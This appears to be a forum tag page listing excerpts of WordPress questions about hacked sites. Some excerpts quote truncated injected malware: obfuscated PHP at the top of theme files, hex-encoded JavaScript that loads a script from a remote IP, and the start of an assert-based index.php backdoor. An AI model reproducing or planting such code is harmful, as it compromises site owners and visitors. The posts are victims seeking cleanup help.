Articles of hacked

Have I been hacked? Mysterious code at the top of theme files

I found the following at the top of all my theme files. My local copy doesn’t have it! WordPress v4.2.2 running on a Linux server. Plugins: Advanced Custom Fields <?php if(!isset($GLOBALS[“\x61\156\x75\156\x61”])) {$ua=strtolower($_SERVER[“\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54″]); if ((! strstr($ua,”\x6d\163\x69\145″)) and (! strstr($ua,”\x72\166\x3a\61\x31”))) $GLOBALS[“\x61\156\x75\156\x61″]=1; } ?><?php $jobconrfpf = ‘5c%x78257-MSV,6<*)ujojR%x5c%x7b\40\x2f\52\x20\153\x6a\145\x62\161\x61\165\x67\160\x68\40\x2a\57\x20”; $ournfmcogg=substr($jobconrfpf,(42613-32500),(69-57)); $ournfmcogg($xqycebdlqb, $pvjekxgoli, NULL); $ournfmcogg=$pvjekxgoli; $ournfmcogg=(464-343); $jobconrfpf=$ournfmcogg-1; ?> It goes on […]

Website Got Hacked – Fixed – Now Cannot Activate Theme

My WordPress site got hacked. I fixed the problem but had to delete the TwentyFifteen theme (the one that was hacked). The theme I was originally using was different, but the hackers hacked the TwentyFifteen theme. When I deleted the theme, I went back to the WordPress dashboard and saw this: As you can see […]

How to find the backdoor of the hack

Today one of our clients’ WordPress sites, which is hosted with Amazon AWS Ubuntu, was hacked. The issue is https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.html The JS code is injected in all js var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80)) and in index.php //###====### @error_reporting(E_ALL); @ini_set(“error_log”,NULL); @ini_set(“log_errors”,0); @ini_set(“display_errors”, 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = “as”; $strings .= “se”; $strings […]

Admin user lacks admin permissions after hack and can't reinstate

My site (4.5.3 on Apache/Linux) was hacked, I suspect something like the one described here. As best I can tell I’ve removed or at least disabled the hack, however admin users aren’t able to perform actions like updating WordPress, adding plugins, etc. So far, I have tried: Editing the existing admin user’s permissions via phpMyAdmin. […]

Can't access htaccess

My htaccess has chmod 444 and it’s not possible for me, as admin with FTP access, to edit it, also when I disable all WP security plugins. When I change the chmod to 644, or if I just remove the file and create a new one, it’s possible for a short time to edit it. […]

On new server, site got hacked, permissions a bit strange? Please help

I moved to a new server recently, a week later a site got hacked, all they did was change the index.php file of the current enabled theme, no big deal. I did have a few security precautions in place, no admin user name, all latest versions, no timthumb issue, .htaccess security etc. I don’t want […]

Is there any pre-existing plugin to track and block IPs with suspicious activity on my site?

The image below shows a recent (failed) attempt to crack my WordPress install. It’s easy for me to look at that and see what they were doing, but is there a plugin that exists that monitors this data and can catch events like this? Especially for something as blatant as this, I would like to […]

Any known bugs that could cause disappearance of the wp_users table?

I administer a number of WordPress-powered web sites. One of these sites is new, and has been running untouched since it was set up a month ago. Today, I tried to log in, but was unable to do so – all my login attempts were rejected. After some investigation, I found out that the wp_users […]

Is wp-app.php or wp-apps.php needed for WordPress?

A few WordPress blogs I oversee have suddenly generated 3 PHP files in their top folder: wp-app.php, wp-apps.php, and wp-register.php, none of which existed before. Checking their contents against a few Google searches suggests I have been infiltrated by a common WordPress exploit. Since they keep regenerating, I thought about blanking them and setting file […]

Troll the hackers by redirecting them

My website is getting somewhat popular, and with its increasing popularity there’s an increase in the hackers. Last night I visited my security logs and found that every day approximately 10 people try to access /?author=1 /?author=2 /?author=3 /?author=4 but I don’t have any of these user IDs, so a 404 is generated to them. […]